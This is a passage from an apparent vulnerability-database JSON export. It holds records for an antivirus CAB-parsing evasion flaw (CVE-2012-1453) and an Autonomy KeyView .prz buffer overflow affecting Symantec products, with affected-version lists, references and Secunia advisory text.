allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. \nThe following products are affected:\nMcAfee 5.0.2.03300\nTrendMicro-HouseCall 9.120.0.1004\nKaspersky 7.0.0.125\nSophos 4.61.0\nTrendMicro 9.120.0.1004\nMcAfee-GW-Edition 2010.1C\nEmsisoft 5.1.0.1\neTrust-Vet 36.1.8511\nAntiy-AVL 2.0.3.7\nMicrosoft 1.6402,\nRising 22.83.00.03\nIkarus T3.1.1.97.0\nFortinet 4.2.254.0\nPanda 10.0.2.7",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1453"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "VULHUB",
"id": "VHN-54734"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-1453",
"trust": 2.8
},
{
"db": "BID",
"id": "52621",
"trust": 1.4
},
{
"db": "OSVDB",
"id": "80487",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80482",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80484",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80483",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80489",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80486",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80488",
"trust": 1.1
},
{
"db": "OSVDB",
"id": "80485",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-54734",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"id": "VAR-201203-0377",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T22:49:45.061000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AVL SDK",
"trust": 0.8,
"url": "http://www.antiy.net/en/avlsdk.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.rising-global.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.vet.com.au/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.drweb.co.jp/"
},
{
"title": "Emsisoft Anti-Malware",
"trust": 0.8,
"url": "http://www.emsisoft.com/en/software/antimalware/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.fortinet.com/"
},
{
"title": "IKARUS virus.utilities",
"trust": 0.8,
"url": "http://www.ikarus.at/en/ngo-gov/products/virus_utilities/index.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ps-japan.co.jp/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://jp.trendmicro.com/jp/home/"
},
{
"title": "Trend Micro HouseCall",
"trust": 0.8,
"url": "http://jp.trendmicro.com/jp/tools/housecall/"
},
{
"title": "Kaspersky Anti-Virus",
"trust": 0.8,
"url": "http://www.kaspersky.com/kaspersky_anti-virus"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sophos.com"
},
{
"title": "Microsoft Security Essentials",
"trust": 0.8,
"url": "http://windows.microsoft.com/ja-JP/windows/products/security-essentials"
},
{
"title": "McAfee Web Gateway",
"trust": 0.8,
"url": "http://www.mcafee.com/japan/products/web_gateway.asp"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522005"
},
{
"trust": 1.7,
"url": "http://www.ieee-security.org/tc/sp2012/program.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/52621"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80482"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80483"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80484"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80485"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80486"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80487"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80488"
},
{
"trust": 1.1,
"url": "http://osvdb.org/80489"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1453"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1453"
},
{
"trust": 0.3,
"url": "http://www.antiy.net"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://www.emsisoft.com/en/software/antimalware/"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2012/mar/88"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/"
},
{
"trust": 0.3,
"url": "http://www.ikarus.at"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com"
},
{
"trust": 0.3,
"url": "http://www.pandasecurity.com/usa/"
},
{
"trust": 0.3,
"url": "http://www.quickheal.co.in/default.asp"
},
{
"trust": 0.3,
"url": "http://www.rising-global.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://www.trend.com"
},
{
"trust": 0.3,
"url": "/archive/1/522005"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54734"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52621"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"date": "2012-03-21T10:11:48.847000",
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-54734"
},
{
"date": "2012-03-30T16:10:00",
"db": "BID",
"id": "52621"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"date": "2012-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple products CAB Vulnerability to bypass malware detection in file parser",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
}
],
"trust": 0.6
}
}
VAR-201107-0115
Vulnerability from variot - Updated: 2025-04-11 21:25Buffer overflow in the Lotus Freelance Graphics PRZ file viewer in Autonomy KeyView, as used in Symantec Mail Security (SMS) 6.x through 8.x, Symantec Brightmail and Messaging Gateway before 9.5.1, and Symantec Data Loss Prevention (DLP) before 10.5.3 and 11.x before 11.1, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .prz file. NOTE: this may overlap CVE-2011-1217. Autonomy KeyView IDOL Contains multiple vulnerabilities in file decoding. Autonomy Provided by Autonomy KeyView IDOL Is 1000 A library that decodes the above file formats. IBM Lotus Notes , Lotus Domino , Symantec Mail Security , Hyland OnBase Used in such applications. Autonomy KeyView IDOL Contains multiple vulnerabilities in file decoding.Although the impact will vary depending on the application, service operation may be interrupted by opening a specially crafted file. (DoS) An attacker may be attacked or execute arbitrary code with user privileges. Autonomy KeyView Filter is prone to a buffer-overflow vulnerability because of a failure to properly bounds check user-supplied input. An attacker can exploit this issue by enticing an unsuspecting victim to open a malicious file or email attachment. Failed exploit attempts will result in a denial-of-service condition. NOTE: This issue was previously discussed in BID 47962 (IBM Lotus Notes Attachment Handling Multiple Buffer Overflow Vulnerabilities) but has been given its own record to better document it. KeyView is a software package for exporting, converting and viewing files in various formats.
For more information: SA44820
SOLUTION: Do not open documents from untrusted sources.
For more information: SA44820
Successful exploitation requires the attachment content scanning option to be enabled.
SOLUTION: Disable the attachment content scanning option. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
For more information see vulnerability #6 in: SA44624
Please see the vendor's advisory for the list for affected products. ----------------------------------------------------------------------
Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria See to the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei. Read more: http://conference.first.org/
TITLE: Autonomy KeyView File Processing Vulnerabilities
SECUNIA ADVISORY ID: SA44820
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44820/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44820
RELEASE DATE: 2011-06-08
DISCUSS ADVISORY: http://secunia.com/advisories/44820/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/44820/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44820
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in Autonomy KeyView, which can be exploited by malicious people to compromise a vulnerable system.
1) An error when processing Windows Write (WRI) files can be exploited to cause a stack-based buffer overflow.
2) Some errors when processing unspecified file formats can be exploited to corrupt memory. No further information is currently available.
The vulnerabilities are reported in versions prior to 10.13.1.
SOLUTION: Update to version 10.13.1.
PROVIDED AND/OR DISCOVERED BY: Will Dormann and Jared Allar, CERT/CC.
ORIGINAL ADVISORY: US-CERT (VU#126159): http://www.kb.cert.org/vuls/id/126159
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201107-0115",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "10.5.1"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "7.7"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "10.5"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "8.1"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "8.1.1"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "4.1.0"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "4.0.0"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "5.0"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "8.0"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.6,
"vendor": "symantec",
"version": "10"
},
{
"model": "brightmail and messaging gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "symantec",
"version": "9.5"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "7.0"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "7.2"
},
{
"model": "data loss prevention",
"scope": "lte",
"trust": 1.0,
"vendor": "symantec",
"version": "10.5.2"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "7.1"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "9.0.1"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "8.0"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "9.0.2"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "9.0"
},
{
"model": "mail security",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "7.5"
},
{
"model": "mail security",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "8.0"
},
{
"model": "brightmail and messaging gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "9.0"
},
{
"model": "data loss prevention",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "11.0"
},
{
"model": "mail security",
"scope": "eq",
"trust": 1.0,
"vendor": "symantec",
"version": "6.0.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "autonomy",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "emc",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hyland",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "lotus",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "palisade",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "proofpoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "symantec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trend micro",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "verdasys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "websense",
"version": null
},
{
"model": "keyview idol",
"scope": "lt",
"trust": 0.8,
"vendor": "autonomy",
"version": "10.13.1 earlier"
},
{
"model": "brightmail gateway and symantec messaging gateway",
"scope": "lte",
"trust": 0.8,
"vendor": "symantec",
"version": "9.5"
},
{
"model": "data loss prevention endpoint agents",
"scope": "lte",
"trust": 0.8,
"vendor": "symantec",
"version": "10.x"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "11.x"
},
{
"model": "data loss prevention enforce/detection servers",
"scope": "lte",
"trust": 0.8,
"vendor": "symantec",
"version": "(linux) 10.x"
},
{
"model": "data loss prevention enforce/detection servers",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "(linux) 11.x"
},
{
"model": "data loss prevention enforce/detection servers",
"scope": "lte",
"trust": 0.8,
"vendor": "symantec",
"version": "(windows) 10.x"
},
{
"model": "data loss prevention enforce/detection servers",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "(windows) 11.x"
},
{
"model": "mail security",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "(domino) 7.5.x"
},
{
"model": "mail security",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "(domino) 8.x"
},
{
"model": "mail security",
"scope": "eq",
"trust": 0.8,
"vendor": "symantec",
"version": "(exchange) 6.x"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.5.1"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.5"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.11"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.10"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.9"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.8"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.7"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.6"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.5"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0"
},
{
"model": "mail security for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "6.0.0.1"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.6"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.3"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.2"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.1"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.10"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.9"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.8"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.7"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.6"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.325"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.5.32"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.4.29"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.3.25"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5.0.19"
},
{
"model": "mail security for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.5"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5.1"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.0.1010.18007"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.187"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.2"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.1"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.101"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.10.9"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.1"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.3"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.6.2"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0.10.38"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.0"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "11.0"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5"
},
{
"model": "data loss prevention endpoint agents",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.0"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5.1"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.0.1010.18007"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.185"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.3"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.2"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.1"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.101"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.10.8"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.1"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.228"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.5.15"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "11.0"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5"
},
{
"model": "data loss prevention detection servers for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.0"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.5.1"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "10.0.1010.18007"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.185"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.3"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.2"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "9.0.1"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.101"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.10.8"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "8.1.1"
},
{
"model": "data loss prevention detection servers for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "symantec",
"version": "7.238"
},
{
